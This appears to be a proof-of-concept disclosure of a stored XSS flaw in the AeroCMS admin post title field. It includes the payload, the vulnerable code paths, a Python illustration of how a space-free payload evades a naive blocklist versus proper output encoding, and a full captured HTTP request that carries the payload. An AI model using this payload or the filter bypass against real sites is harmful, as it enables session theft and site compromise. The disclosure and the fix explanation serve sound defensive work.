D4rkP0w4r/AeroCMS-Add_Posts-Stored_XSS-Poc
AeroCMS-Add_Posts-Stored_XSS-Poc

  • Description => Stored XSS in the Post Title field of the admin Posts form

Steps to Reproduce

  • Log in to the admin panel -> Posts -> Add Posts -> Post Title -> inject the payload <img/src/onerror=prompt(10)> -> the XSS fires when the Edit Post button is clicked, because the stored title is rendered back into the page without encoding

Exploit

[screenshots]

Vulnerable Code

  • add_post.php: when the post is inserted into the database, the title is stored as-is; HTML characters in the input are neither filtered nor encoded
  • post.php: when the title is displayed, it is output without HTML entity encoding, so the browser renders the stored markup
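The two points above are the whole bug: the title is stored raw and echoed raw. The block below is an added example, not AeroCMS code, that mirrors that behaviour in Python and contrasts it with the fix. It also includes a constructed blocklist filter to show why the PoC payload is written without spaces or quotes: a filter that looks for `<script>` or for whitespace-separated `on*=` attributes does not match it, whereas entity encoding at output (html.escape here, htmlspecialchars with ENT_QUOTES in PHP) neutralises it regardless of payload shape.

```python
"""Why the AeroCMS title is exploitable and how output encoding stops it.

Added example, not code from AeroCMS. render_vulnerable mirrors post.php as
described (stored title echoed as-is); render_fixed is the corrected form.
naive_filter is a constructed blocklist that the space-free payload bypasses.
"""
import html
import re

PAYLOAD = "<img/src/onerror=prompt(10)>"

# A tag carrying an on* event handler, i.e. what the browser would execute.
# Used only to check rendered output below, not as a sanitiser.
EVENT_HANDLER_TAG = re.compile(r"<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def naive_filter(title):
    """Constructed blocklist: strips <script> blocks and whitespace-separated
    on*= attributes. The PoC payload uses '/' instead of spaces, so it passes."""
    title = re.sub(r"<script.*?>.*?</script>", "", title,
                   flags=re.IGNORECASE | re.DOTALL)
    title = re.sub(r"\s+on\w+\s*=", " ", title, flags=re.IGNORECASE)
    return title


def render_vulnerable(title):
    """Like post.php as described above: the stored title is inserted raw."""
    return f"<h1>{title}</h1>"


def render_fixed(title):
    """Encode at output: < > & " ' become entities, so the title is text, not markup.
    PHP equivalent: htmlspecialchars($title, ENT_QUOTES, 'UTF-8')."""
    return f"<h1>{html.escape(title, quote=True)}</h1>"


def executes(rendered):
    """True if the rendered HTML still contains a tag with an on* handler."""
    return EVENT_HANDLER_TAG.search(rendered) is not None


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD), executes(render_vulnerable(PAYLOAD)))
    print("filtered:  ", render_vulnerable(naive_filter(PAYLOAD)),
          executes(render_vulnerable(naive_filter(PAYLOAD))))
    print("fixed:     ", render_fixed(PAYLOAD), executes(render_fixed(PAYLOAD)))
```

The right place for the fix is the output in post.php (and anywhere else the title is echoed), not the insert in add_post.php: encoding on the way in breaks any later non-HTML use of the title and still leaves every other raw echo exploitable.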

POC

  • Injection Point
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
  • Request
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291
Content-Length: 1101
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26
Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2
Upgrade-Insecure-Requests: 1

-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_title"

<img/src/onerror=prompt(10)>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_category_id"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_user"

admin
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_status"

published
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_tags"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post_content"

<p>111</p>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="update_post"

Edit Post
-----------------------------85448121341942511952219062291--

POC VIDEO https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing
